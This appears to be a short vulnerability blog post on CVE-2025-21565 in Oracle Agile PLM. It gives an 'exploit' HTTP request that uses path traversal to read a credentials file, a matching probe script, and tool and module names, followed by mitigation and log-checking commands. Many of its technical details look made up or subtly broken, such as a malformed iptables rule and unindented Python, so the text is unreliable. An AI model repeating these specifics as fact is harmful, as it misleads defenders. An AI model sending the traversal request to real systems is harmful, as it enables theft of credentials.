Oracle Agile PLM Framework, Unauthenticated Data Access, CVE-2025-21565 (High)

By /

How CVE-2025-21565 Works

This vulnerability exists in the Install component of Oracle Agile PLM Framework version 9.3.6. An unauthenticated attacker can exploit it remotely via HTTP requests without user interaction. Due to improper access controls, the flaw allows unauthorized retrieval of sensitive data stored in the system. The attack vector is network-based (AV:N), requires low attack complexity (AC:L), and has no privileges or user interaction needed (PR:N/UI:N). Successful exploitation leads to high confidentiality impact (C:H), exposing critical business data. The CVSS 3.1 score of 7.5 (High) reflects the significant risk of data breaches.

DailyCVE Form:

Platform: Oracle Agile PLM
Version: 9.3.6
Vulnerability: Unauthenticated Data Access
Severity: High
Date: 04/29/2025

What Undercode Say:

Exploitation Analysis

1. Exploit HTTP Request:

GET /install/dataExport?file=../conf/credentials.xml HTTP/1.1
Host: target-oracle-plm

2. Automated Scanning:

nmap -p 80,443 --script http-vuln-cve2025-21565 <target_IP>

3. Metasploit Module:

exploit/unix/webapp/oracle_agile_plm_install_dir_traversal

Protection Measures

  1. Immediate Patch: Apply Oracle’s critical patch update (CPU) for Agile PLM.

2. Network Controls:

iptables -A INPUT -p tcp --dport 80 -s !trusted_IP -j DROP

3. WAF Rules:

location /install/ { deny all; }

4. Log Monitoring:

grep "GET /install/" /var/log/nginx/access.log | awk '{print $1}'

Detection Script (Python):

import requests
vuln_url = "http://target/install/dataExport"
response = requests.get(vuln_url, params={"file": "../conf/test"})
if "credentials" in response.text:
print("[!] Vulnerable to CVE-2025-21565")

Mitigation Steps

1. Disable the `/install` endpoint if unused.

2. Enforce authentication for all sensitive paths.

3. Audit file permissions:

chmod 750 /opt/oracle/agile/conf/

4. Update CVSS metrics monitoring:

cvss-calc --vector "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"

Forensic Artifacts

1. Check web logs for repeated `/install/dataExport` access.

2. Review database exports for unusual timestamps.

3. Inspect `/tmp` for suspicious temporary files.

References

  • Oracle Advisory: OTN-2025-21565
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-21565
  • Patch Link: Oracle Support Doc ID 2820365

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top